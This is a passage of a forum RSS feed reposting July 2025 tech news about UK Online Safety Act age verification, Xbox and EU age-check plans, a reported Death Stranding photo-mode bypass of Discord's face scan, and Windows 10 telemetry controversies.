	<span style="font-size:12px;"><em>Posted Wednesday 30 July 2025 at 4:04 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30501</guid><pubDate>Tue, 29 Jul 2025 18:05:34 +0000</pubDate></item><item><title>The UK is slogging through an online age-gate apocalypse</title><link>https://nsaneforums.com/news/security-privacy-news/the-uk-is-slogging-through-an-online-age-gate-apocalypse-r30488/</link><description><![CDATA[<h3>
	It’s a good time to be a VPN provider.
</h3>

<p>
	People across the United Kingdom have been faced with a censored and partially inaccessible online landscape since the country introduced its <a href="/news/713637/the-uk-is-now-age-gating-the-internet" rel="">latest digital safety rules on Friday</a>.
</p>

<p>
	 
</p>

<p>
	The Online Safety Act mandates that web service operators must use “highly effective” age verification measures to stop kids from accessing a wide range of material, on penalty of heavy fines and criminal action against senior managers. It’s primarily focused on <a href="https://www.ofcom.org.uk/online-safety/protecting-children/online-age-checks-must-be-in-force-from-tomorrow" rel="external nofollow">pornography</a> and content that promotes suicide, self-harm, or eating disorders, but <a href="https://www.legislation.gov.uk/ukpga/2023/50/section/62" rel="external nofollow">the scope of “priority content”</a> also includes materials related to bullying, abusive or hateful content, and dangerous stunts or challenges.
</p>

<p>
	 
</p>

<p>
	Effectively, web platforms must either set up an age verification system that poses potential privacy risks, default to blocking huge swaths of potentially questionable content, or entirely pull out of the UK. Residents are finding themselves locked out of anything from period-related subreddits to hobbyist forums — it’s little wonder that <a href="/analysis/713773/uk-online-safety-act-age-verification-bypass-vpn" rel="">they’re turning to VPNs</a>.
</p>

<p>
	 
</p>

<p>
	Over the past several days, several large social media platforms have started requiring age verification in the UK to access certain features and types of content, in partnership with third-party software providers. Users typically have a choice between uploading bank card information, an image of government-issued ID, or a facial scan that estimates the user’s age.
</p>

<p>
	 
</p>

<p>
	Meta users likely won’t have seen a huge difference over the weekend, as Facebook and Instagram rolled out age verification requirements a few years ago. Bluesky users in the UK, however, now can’t access direct messaging capabilities until they complete the platform’s new age verification process. Reddit has also blocked access to <a href="https://www.reddit.com/r/AskUK/comments/1m8tjeh/whats_the_stupidest_subreddit_youve_seen/" rel="external nofollow">specific subreddits</a> for UK-based users who don’t complete its age verification process, some of which — r/periods, r/stopsmoking, r/stopdrinking, and r/sexualassault, for example — provide valued community support and resources for adults and minors alike.
</p>

<p>
	 
</p>

<p>
	People are already finding loopholes for these systems. The face scanning systems for Persona and k-ID — the third-party verification software used by Reddit and Discord, respectively — can both be <a href="/report/714402/uk-age-verification-bypass-death-stranding-reddit-discord" rel="">easily tricked using <em>Death Stranding</em>’s photo mode</a>. (Facebook and Instagram use a similar service <a href="https://help.instagram.com/966909308115586/?helpref=related_articles" rel="external nofollow">called Yoti</a>, which so far does not appear to have been fooled the same way.)
</p>

<p>
	 
</p>

<p>
	X doesn’t yet have a direct verification system, and is instead <a href="https://help.x.com/en/rules-and-policies/age-assurance" rel="external nofollow">currently estimating age</a> based on factors like account creation date, social connections, email addresses, and legacy verification. Accounts that don’t have any of these signals in place are locked out of accessing certain content until X rolls out the ID and facial scanner-based checkers it’s planning to release “in the following weeks.” That includes protest footage and video game clips that depict violence — and <a href="https://x.com/naranciagaming/status/1949114296383775040" rel="external nofollow">users who aren’t</a> <a href="https://www.reddit.com/r/techsupport/comments/1m98k4o/being_affected_by_uk_online_safety_act_on_twitter/" rel="external nofollow">even based in the UK</a> are reporting content restrictions as well.
</p>

<p>
	 
</p>

<p>
	Outside the biggest platforms, some sites are entirely inaccessible. Cybersecurity company <a href="https://go.skimresources.com/?id=1025X1701640&amp;xs=1&amp;url=https%3A%2F%2Fwww.mcafee.com%2Fblogs%2Finternet-security%2Fuks-new-online-safety-act-what-consumers-need-to-know%2F%23%3A~%3Atext%3DOver%25206%252C000%2520websites%2520hosting%2520adult%2Cselfies%2520or%2520government%2520ID%2520photos.&amp;xcust=__vg0729awD__714587__________________" rel="external nofollow" target="_blank">McAfee reports</a> that more than 6,000 websites that host adult content have already implemented age assurance methods, but others have opted to geoblock their services in the UK. A <a href="https://www.blocked.org.uk/osa-blocks" rel="external nofollow">wide variety of unrelated, innocuous websites have followed suit</a>. That includes forums for owners of EV Renault vehicles, electronic music production, beaded jewelry patterns, and tech-focused blogs. Many smaller forums simply don’t have the resources to support third-party verification systems or risk millions of dollars in fines.
</p>

<p>
	 
</p>

<p>
	<a href="/news/663402/wikipedia-fights-the-uks-flawed-and-burdensome-online-safety-rules" rel="">Wikipedia has voiced similar concerns</a> over other Online Safety Act rules that could require it to verify its adult contributors, which the <a href="https://wikimediafoundation.org/news/2025/07/17/wikimedia-foundation-challenges-uk-online-safety-act-regulations/" rel="external nofollow">Wikimedia Foundation behind Wikipedia says</a> could leave volunteers vulnerable to “data breaches, stalking, lawsuits, or even imprisonment by authoritarian regimes.” As such, while it’s still available for now, the platform is also <a href="https://www.telegraph.co.uk/business/2025/07/23/wikipedia-threatens-limit-access-website-britain/" rel="external nofollow">considering blocking UK users</a> to avoid compliance entirely.
</p>

<p>
	 
</p>

<p>
	The UK’s communications regulator, Ofcom, declined to offer an attributed on-the-record comment about the new age checks to <em>The Verge</em>. In unattributed statements to other outlets, it said it was “now assessing compliance to make sure platforms have them in place, and companies that fall short should expect to face enforcement action.”
</p>

<p>
	 
</p>

<p>
	UK residents have <a href="https://petition.parliament.uk/petitions/722903" rel="external nofollow">launched a parliamentary petition</a> in response to the sweeping age verification requirements, urging the UK government to repeal the Online Safety Act, and describing it as “far broader and restrictive than is necessary in a free society.” The petition has attracted more than 350,000 signatures at the time of writing, surpassing the 100,000 signatures needed to force the government to consider holding a debate over the demands.
</p>

<p>
	 
</p>

<p>
	Meanwhile, some users have been finding ways to avoid undergoing verification entirely, expressing distrust over handing their personal information over to private overseas companies. Many restrictions can be evaded by using a VPN, which masks the user’s true location by making it seem like they’re in another country — one without the UK’s rigid online safety rules. VPN apps are currently five out of the top 10 most popular free apps on Apple’s iOS store in the UK. The top spot is currently held by Swiss-based VPN provider Proton VPN, which surpassed ChatGPT over the weekend.
</p>

<p>
	 
</p>

<p>
	Proton VPN’s general manager, David Peterson, told <em>The Verge</em> that it had seen a more than 1,800 percent increase in daily sign-ups from UK-based users since Friday. The UK is now one of the countries generating the highest usage for Proton VPN, according to Peterson, with the vast majority of new users signing up for free accounts.
</p>

<p>
	 
</p>

<p>
	“This clearly shows that adults are concerned about the impact universal age verification laws will have on their privacy,” said Peterson. “The sign-up spike in the UK follows a similar pattern as when other governments put in place restrictions on communication or social media platforms, and shouldn’t be surprising since services like Wikipedia, Reddit, and X are reportedly being asked to comply with age verification requirements.”
</p>

<p>
	 
</p>

<p>
	<a href="https://www.theverge.com/analysis/714587/uk-online-safety-act-age-verification-reactions" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 29 July 2025 at 9:09 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30488</guid><pubDate>Mon, 28 Jul 2025 23:15:45 +0000</pubDate></item><item><title>Microsoft starts rolling out Xbox age verification in the UK</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-starts-rolling-out-xbox-age-verification-in-the-uk-r30487/</link><description><![CDATA[<h3>
	You’ll need to verify your age in the UK to keep accessing Xbox social features.
</h3>

<p>
	Microsoft is starting to comply with the UK’s Online Safety Act by prompting Xbox players to verify their age today. The prompts will be shown to Xbox players who indicate they’re over the age of 18 and will be shown when you sign into an Xbox account in the UK. Microsoft says it’s also exploring bringing similar age verification tools to other countries in the future.
</p>

<p>
	 
</p>

<p>
	To power the age verification in the UK, Microsoft is partnering with Yoti, which is one of the services that hasn’t fallen victim to the <a href="/report/714402/uk-age-verification-bypass-death-stranding-reddit-discord" rel=""><em>Death Stranding</em> photo mode bypass</a>. While the age verification checks are optional right now, they will become a requirement to access a variety of Xbox services in early 2026, when additional parts of the UK’s Online Safety Act <a href="https://www.ofcom.org.uk/online-safety/illegal-and-harmful-content/important-dates-for-online-safety-compliance" rel="external nofollow">come into force</a>.
</p>

<p>
	 
</p>

<p>
	“Starting early next year, age verification will be required for these players in the UK to retain full access to social features on Xbox, such as voice or text communication and game invites,”<a href="https://news.xbox.com/en-us/2025/07/28/xbox-age-verification-uk/" rel="external nofollow"> explains Kim Kunes</a>, vice president of gaming trust and safety at Xbox. If you don’t verify your age between now and early next year, social features “will become limited to friends only” until the age verification process has been completed.
</p>

<p>
	 
</p>

<p>
	“Whether a player verifies their age will not affect any previous purchases, entitlements, gameplay history, achievements, or the ability to play and purchase games, however we encourage players to verify their age via this one-time process now to avoid uninterrupted use of social features on Xbox in the future,” Kunes says.
</p>

<p>
	 
</p>

<p>
	While this is limited to Xbox players in the UK right now, Kunes says, “We expect to roll out age verification processes to more regions in the future.” Microsoft isn’t revealing which other regions will get similar age verification requirements, but Kunes does note that “these methods may look different across regions and experiences.”
</p>

<p>
	 
</p>

<p>
	If you’re in the UK, then you can verify your age for your Xbox account <a href="https://aka.ms/XboxUKAgeVerification" rel="external nofollow">online through Microsoft</a>, where you can use a selfie, a scan of your passport or driver’s license, a credit card check, or a mobile number.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.theverge.com/news/714458/microsoft-xbox-age-verification-uk-social-features" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 29 July 2025 at 9:08 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30487</guid><pubDate>Mon, 28 Jul 2025 23:09:04 +0000</pubDate></item><item><title>Gamers bypass UK age verification with Death Stranding &#x2014; no real face or VPN required</title><link>https://nsaneforums.com/news/security-privacy-news/gamers-bypass-uk-age-verification-with-death-stranding-%E2%80%94-no-real-face-or-vpn-required-r30477/</link><description><![CDATA[<h3>
	A new UK law requires age verification for adult content, but Discord’s face scan check can be fooled with a video game selfie.
</h3>

<p>
	Viewing adult content now requires age verification within the United Kingdom. The UK's Online Safety Act went into effect late last week, causing many to see prompts to scan their own face or scan an ID.
</p>

<p>
	 
</p>

<p>
	Several popular websites began preparing for the age verification requirement earlier this month, including <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/reddit" href="https://www.windowscentral.com/tag/reddit" rel="external nofollow">Reddit</a>. But with the Online Safety Act enacted and being enforced, the biggest adult websites now require verification.
</p>

<p>
	 
</p>

<p>
	It appears some people did not want to pick either of those options to view adult content. Various workarounds have been discovered, including using a VPN.
</p>

<p>
	 
</p>

<p>
	But one particular bypass drew attention: you can use a video game to trick the security scan.
</p>

<p>
	 
</p>

<p>
	<a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://x.com/DanySterkhov/status/1948665431633404170" href="https://x.com/DanySterkhov/status/1948665431633404170" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">X user Dany Sterkhov</a> shared that you can use the photo mode of Death Stranding to bypass the security check on <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/discord" href="https://www.windowscentral.com/tag/discord" rel="external nofollow">Discord</a>.
</p>

<p>
	 
</p>

<p>
	The fact that a still image displayed on a computer screen can trick the first step of the verification process does not speak highly of the check's robustness. But I suppose Discord deserves some credit for requiring a pose in a different position to get fully verified.
</p>

<p>
	 
</p>

<p>
	The k-ID system within Discord will ask you for a photo with your mouth open to confirm that you're real. You can meet that requirement by snapping a picture of Sam Porter Bridges, the protagonist of Death Stranding, within the game's photo mode.
</p>

<p>
	 
</p>

<div id="slice-container-newsletterForm-articleInbodyContent-PWSXyH3NkP2uLPGKYdyFya">
	<div data-hydrate="true">
		<p>
			I imagine you could use the photo mode from several games to perform the same task. I wouldn't be surprised to see face swapping apps market themselves as a way to bypass age verification scans. Heck, maybe <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence" data-before-rewrite-redirect="https://www.windowscentral.com/tag/artificial-intelligence" href="https://www.windowscentral.com/artificial-intelligence" rel="external nofollow">AI</a> will get involved in the age verification arms race.
		</p>

		<p>
			 
		</p>

		<p>
			What I can say for sure is that Death Stranding's photo mode bypassed Discord's age check. Our friends at <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.pcgamer.com/hardware/brits-can-get-around-discords-age-verification-thanks-to-death-strandings-photo-mode-bypassing-the-measure-introduced-with-the-uks-online-safety-act-we-tried-it-and-it-works-thanks-kojima/" href="https://www.pcgamer.com/hardware/brits-can-get-around-discords-age-verification-thanks-to-death-strandings-photo-mode-bypassing-the-measure-introduced-with-the-uks-online-safety-act-we-tried-it-and-it-works-thanks-kojima/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">PC Gamer</a> tried it out and taking a photo of the character worked despite him wearing a hat.
		</p>

		<h3 class="article-body__section" id="section-vpn-usage-spikes-in-uk">
			<span>VPN usage spikes in UK</span>
		</h3>

		<p>
			While the Death Stranding workaround is funny, using one of the <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.tomsguide.com/best-picks/best-vpn" href="https://www.tomsguide.com/best-picks/best-vpn" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">best VPNs</a> is probably a better option. In addition to being able to bypass certain restrictions, using a VPN can improve your security and protect your data.
		</p>

		<p>
			 
		</p>

		<p>
			In news that is unlikely to surprise anyone, VPN usage skyrocketed after the UK began enforcing age verification rules for adult websites. <a data-analytics-id="inline-link" data-google-interstitial="false" data-hl-processed="hawklinks" data-merchant-id="208252" data-merchant-name="Proton VPN" data-merchant-network="HasOffersProtonVPN" data-merchant-url="protonvpn.com" data-placeholder-url="https://go.getproton.me/aff_c?offer_id=25&amp;aff_id=1046&amp;source=windowscentral&amp;aff_click_id=hawk-custom-tracking&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_sub2=hawk-article-url" data-url="https://protonvpn.com/internet-censorship-observatory" href="https://go.getproton.me/aff_c?offer_id=25&amp;aff_id=1046&amp;source=windowscentral&amp;aff_click_id=wp-gb-3796227608618649284&amp;url=https%3A%2F%2Fprotonvpn.com%2Finternet-censorship-observatory%3FvisitorId%3Dho-%7Btransaction_id%7D%26aid%3D%7Baffiliate_id%7D%26offer_id%3D%7Boffer_id%7D%26url_id%3D%7Boffer_url_id%7D%26utm_campaign%3Dww-all-2a-vpn-gro_aff-g_acq-partners_program%26utm_medium%3Dlink%26utm_source%3Daid-tune-%7Baffiliate_id%7D%26utm_content%3D%7Boffer_id%7D%26hfp%3Dfalse%26spl%3D%7Baffiliate_id%7D&amp;aff_sub2=https%3A%2F%2Fwww.windowscentral.com%2Fgaming%2Fgamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Proton VPN observed a 1400% hourly increase</a> in sign-ups following the enactment of the Online Safety Act in the UK.
		</p>

		<p>
			 
		</p>

		<p>
			Google searches for "Proton" increased 100-fold last Friday. The VPN provider shared a playful graph illustrating the increase on X.
		</p>

		<p>
			 
		</p>

		<div class="ipsEmbeddedOther" contenteditable="false">
			<iframe allowfullscreen="" class="ipsEmbed_finishedLoading" data-controller="core.front.core.autosizeiframe" data-embedid="embed2980812130" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/ProtonVPN/status/1948669815293698266" style="overflow: hidden; height: 672px;"></iframe>
		</div>

		<div>
			<div>
				<p>
					Proton VPN ranks among the top-tier VPNs, as highlighted by our friends at Tom's Guide. But there are several other good options available.
				</p>

				<p>
					 
				</p>

				<p>
					If you're hunting for a new VPN, our colleagues at TechRadar track the <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.techradar.com/vpn/best-vpn" href="https://www.techradar.com/vpn/best-vpn" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">best VPN deals</a>.
				</p>

				<h3 class="article-body__section" id="section-what-is-death-stranding">
					<span>What is Death Stranding?</span>
				</h3>

				<p>
					Death Stranding is a video game set in a post-apocalyptic world. It's an open-world game that rewards players who are keen to explore.
				</p>

				<p>
					 
				</p>

				<p>
					Hideo Kojima of Metal Gear Solid fame developed the game, bringing a unique style that fans have come to expect.
				</p>

				<p>
					 
				</p>

				<p>
					If you exclusively play games on Xbox hardware, you would not have been able to play Death Stranding until late last year.
				</p>

				<p>
					 
				</p>

				<p>
					Kojima Productions has fully acquired the rights to the Death Stranding franchise, which makes it more likely <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/gaming/is-death-stranding-2-coming-to-xbox" href="https://www.windowscentral.com/gaming/is-death-stranding-2-coming-to-xbox" rel="external nofollow">Death Stranding 2</a> will launch for Xbox without people having to wait.
				</p>

				<p>
					 
				</p>

				<p>
					Death Stranding first launched as a PlayStation exclusive before becoming available through <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/tag/pc-game-pass" href="https://www.windowscentral.com/tag/pc-game-pass" rel="external nofollow">PC Game Pass</a> and Steam.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/gaming/gamers-bypass-uk-age-verification-with-death-stranding-no-real-face-or-vpn-required" rel="external nofollow">Source</a>
				</p>

				<hr class="ipsHr">
				<p>
					<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>Posted Monday 28 July 2025 at 12:38 pm AEST (my time).</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
				</p>

				<p>
					<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
				</p>
			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">30477</guid><pubDate>Mon, 28 Jul 2025 02:39:17 +0000</pubDate></item><item><title>EU's new age verification app faces criticism over Google dependence</title><link>https://nsaneforums.com/news/security-privacy-news/eus-new-age-verification-app-faces-criticism-over-google-dependence-r30476/</link><description><![CDATA[<p>
	The European Union is developing a new, open-source Android app for age verification so that users can prove their age to online services while protecting their privacy. This app will act as a toolbox component that other member states will be able to build their own custom solutions on.
</p>

<p>
	 
</p>

<p>
	Right now, the app is an initial, prototype version and isn’t ready for production use. Additionally, its current release still lacks full security features such as code obfuscation and anti-tampering measures.
</p>

<p>
	 
</p>

<p>
	While a homegrown app for age verification could theoretically have significant advantages over trusting sensitive information to third-party age assurance companies, plans for this app have caused some commotion online.
</p>

<p>
	 
</p>

<p>
	Plans for this app include using the Google Play Integrity API for device and app verification. The API checks to see whether the OS is licensed by Google and if the app was downloaded from the Play Store. This means that if you try to use an app on a non-Google-licensed Android system or try to download an app from outside the Play Store, it won’t work.
</p>

<p>
	 
</p>

<p>
	This feature is not yet implemented, but it is planned. If this plan does go ahead, it could limit user freedom and it also flies in the face of the EU’s antitrust actions against Google.
</p>

<p>
	 
</p>

<p>
	Numerous users and developers have already raised their concerns on GitHub about the planned Google Play Integrity integrations. Critics argue that such a measure would create dependency on American tech giants and undermine EU digital sovereignty.
</p>

<p>
	 
</p>

<p>
	People responding to the proposal in a <a automate_uuid="c380a4c9-ff42-49f7-906d-e881a4b495eb" href="https://github.com/eu-digital-identity-wallet/av-app-android-wallet-ui/issues/10" rel="external nofollow">GitHub issue</a> referred the developers to existing identity apps such as Yivi, a Dutch age-verification app that functions without the Google Play Integrity API and is available on open-source app stores such as F-Droid.
</p>

<p>
	 
</p>

<p>
	At the time of writing, the issue remains open and a <a automate_uuid="b13e2dd7-6b47-4516-a83b-69256216d94d" href="https://www.reddit.com/r/BuyFromEU/comments/1mah79o/eu_age_verification_app_to_ban_any_android_system/" rel="external nofollow">thread on Reddit</a> has attracted attention to it. However, the maintainers of the project have not yet responded to the concerns.
</p>

<p>
	 
</p>

<p>
	Image via <a automate_uuid="ba21967b-fc72-4cde-8ee8-8bc218306151" href="http://Depositphotos.com" rel="external nofollow">Depositphotos.com</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/eus-new-age-verification-app-faces-criticism-over-google-dependence/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Monday 28 July 2025 at 12:36 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a> | Farewell my friend  </span></strong>
</p>
]]></description><guid isPermaLink="false">30476</guid><pubDate>Mon, 28 Jul 2025 02:37:25 +0000</pubDate></item><item><title>Windows 10 is the reason why we are so conscious about privacy now</title><link>https://nsaneforums.com/news/security-privacy-news/windows-10-is-the-reason-why-we-are-so-conscious-about-privacy-now-r30462/</link><description><![CDATA[<p>
	About a year ago, <a automate_uuid="bd9c0d3a-2c22-4fd0-aaa9-6c5ba6a6fa21" href="https://www.neowin.net/news/windows-11s-ai-explorer-debuts-as-recall-a-feature-that-remembers-everything-you-do/" rel="external nofollow">Microsoft debuted Recall in Windows 11</a>, a feature that would record and remember everything that you do on your PC, allowing you to ask more contextual questions about your various activities and workflows from a dedicated assistant. Although the Redmond firm offered various <a automate_uuid="421f8984-c3f2-4b82-aa0b-2907ee8dc4d3" href="https://www.neowin.net/news/microsoft-shares-more-info-about-privacy-controls-in-the-new-recall-feature-in-windows-11/" rel="external nofollow">privacy controls for Recall</a> and <a automate_uuid="5c48baf7-d66e-4080-b7c7-99159a6cbcc8" href="https://www.neowin.net/news/microsoft-gives-in-makes-recall-an-opt-in-feature-and-introduces-new-privacy-measures/" rel="external nofollow">even made it opt-in rather than mandatory</a>, the launch was a disaster and the <a automate_uuid="ae0d136b-b4ff-4156-90a6-afecb91a2b53" href="https://www.neowin.net/news/microsoft-delays-the-launch-of-recall-for-copilot-pcs-theres-no-word-on-a-new-date/" rel="external nofollow">company had to recall Recall</a>.
</p>

<p>
	 
</p>

<p>
	All of this happened because people were not happy that <a automate_uuid="7d92cb53-ecd4-4da7-9e51-a85a674c0705" href="https://www.neowin.net/news/despite-assurances-windows-11s-recall-still-captures-a-lot-of-sensitive-data/" rel="external nofollow">Microsoft would record everything</a> that they do on their PC and then share that information with an AI model, despite the company's assurances that all of this would happen locally and no data would be sent to Redmond's servers. Couple that with some <a automate_uuid="92df3ecb-e6c0-428d-8b57-0993970f6734" href="https://www.neowin.net/news/windows-11s-new-ai-feature-makes-it-way-too-easy-to-steal-everything-you-viewed-or-typed/" rel="external nofollow">lackluster security features</a> and it was just a disaster waiting to happen.
</p>

<p class="img-center">
	<img alt="Windows Recall" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/04/1745574767_recall.jpg">
</p>

<p>
	Although things have improved quite a bit since then, <a automate_uuid="1bdfb09b-cbe4-4120-bb0b-83a3a55169dd" href="https://www.neowin.net/news/recall-is-now-available-for-windows-insiders/" rel="external nofollow">thanks to extensive testing in Insider Channels</a>, some third-parties are still giving users controls that will allow them to <a automate_uuid="6e533ba3-c257-46fb-a2a8-7d8f689837dc" href="https://www.neowin.net/news/adguard-is-yet-another-app-to-block-windows-recall/" rel="external nofollow">block Recall for the vendor's software</a>. I personally believe that this is a good thing, and we definitely should have more scrutiny around software that captures our activities (even with our consent). But as we approach <a automate_uuid="cc8654f8-b956-4db9-a302-7abac4bae573" href="https://www.neowin.net/news/everything-you-need-to-know-about-the-end-of-windows-10-support/" rel="external nofollow">Windows 10's 10th birthday and eventual end of support date</a>, I can't help but realize that the main reason behind Windows customers being very privacy conscious nowadays is the beloved Windows 10 operating system itself.
</p>

<h3>
	Windows 10 and the telemetry fiasco
</h3>

<figure class="image image--expandable">
	<img alt="Windows 10 wallpaper" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/06/1750766875_windows_10.webp">
</figure>

<p>
	To truly understand what I mean, we have to go back a decade, <a automate_uuid="b4bb2b8c-4068-49ae-ae9c-d28d9cb21f33" href="https://www.neowin.net/reviews/windows-10-review-microsoft-goes-back-to-the-future/" rel="external nofollow">to the launch of Windows 10 in 2015</a>. Although the operating system has an ardent fanbase now, things weren't always this way. In fact, Windows 10 had a fairly rocky launch, and one of the reasons behind this was dreaded word <strong>telemetry</strong>.
</p>

<p>
	 
</p>

<p>
	Anyone who has spent some time in the field of software development and productionizing solutions knows that telemetry typically the <strong>anonymized</strong> collection of data from various signals to monitor the health of software and diagnose a problem in case of any issues. Telemetry is very useful, for example, in cases where your Microsoft Word application may unexpectedly crash. Microsoft would monitor the telemetry logs from this crash, diagnose the problem, and ideally deliver a fix so that it doesn't happen on your or anyone else's device again.
</p>

<p>
	 
</p>

<p>
	Now, telemetry collection is a regular process, all major software vendors have it at some level. However, when Microsoft decided to mention it in their privacy statement for Windows 10's Technical Preview (this is what Windows Insider Previews were called at that time) in 2014, there was massive uproar. Things spiraled to the point that people began to allege that Microsoft is spying on literally everything that you do through Windows 10.
</p>

<p class="img-center">
	<img alt="Cortana logo and text on a dark background" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2020/09/1600718774_cortana_logo.jpg">
</p>

<p>
	The backlash was so significant that by April 2015, a few months prior to the launch of Windows 10, Microsoft was scrambling to <a automate_uuid="1992300e-16a7-42ec-8e03-821f7fe8cca4" href="https://www.neowin.net/news/microsoft-adds-more-privacy-options-in-windows-10-preview-build-10061/" rel="external nofollow">add new privacy controls in the operating system in response</a> and the ability to delete content that <a automate_uuid="25ee1172-7a69-472c-adee-db182dc165c6" href="https://www.neowin.net/news/microsoft-adds-ability-to-remove-your-content-from-cortana-in-windows-10/" rel="external nofollow">Cortana (R.I.P) remembered about you</a>. Heck, we even had software pirates and torrent-sharing groups <a automate_uuid="647852f3-2c7a-4030-8008-ed1754602efe" href="https://www.neowin.net/news/hardcore-pirates-to-ban-windows-10-users-over-privacy-fears/" rel="external nofollow">banning Windows 10 over privacy concerns</a>. Even Russian law firms began applying pressure on Moscow to <a automate_uuid="8037f0e6-b39c-45a9-bdf7-4e2a3a491ccf" href="https://www.neowin.net/news/russian-prosecutors-urged-to-investigate-microsoft-over-claims-windows-10-is-spying-on-users/" rel="external nofollow">investigate Microsoft over Windows 10's alleged spying</a>. By 2017, Microsoft was under scrutiny from <a automate_uuid="fed1b34f-679d-4055-92f8-10a7d8fc7f65" href="https://www.neowin.net/news/microsoft-announced-new-windows-10-privacy-features-after-investigation-by-swiss-regulators/" rel="external nofollow">Switzerland</a>, <a automate_uuid="73dcd149-b0eb-465d-ac05-7bc5e8fecdff" href="https://www.neowin.net/news/frances-cnil-windows-10-collects-too-much-information-and-isnt-secure/" rel="external nofollow">France</a>, and other <a automate_uuid="84faf827-3cf2-44ff-aa29-97a52a50f8c0" href="https://www.neowin.net/news/european-authorities-raise-fresh-concerns-over-windows-10-data-collection/" rel="external nofollow">European authorities because of these claims</a>.
</p>

<p>
	 
</p>

<p>
	During this tumultuous period, the Redmond tech firm was constantly <a automate_uuid="6f401360-b1da-4299-8259-38ee73a771a5" href="https://www.neowin.net/news/microsoft-states-that-windows-10-does-not-breach-your-privacy/" rel="external nofollow">putting out statements to convince people that Windows 10 does not spy on you</a>, all while building a <a automate_uuid="c255b3e1-fbc0-4941-b934-75018da94708" href="https://www.neowin.net/news/microsoft-launches-privacy-dashboard-offers-you-more-control-over-your-data-in-windows-10/" rel="external nofollow">dedicated privacy dashboard for the operating system</a> and <a automate_uuid="6fce1776-3724-49e6-9796-686dd702c59b" href="https://www.neowin.net/news/microsoft-restores-windows-10-november-update-media-explains-why-it-was-pulled/" rel="external nofollow">fixing actual Windows 10 privacy bugs</a>. It was clear that Windows 10's launch hadn't been as smooth as the company probably would have wanted.
</p>

<h3>
	Turning the privacy corner
</h3>

<p class="img-center">
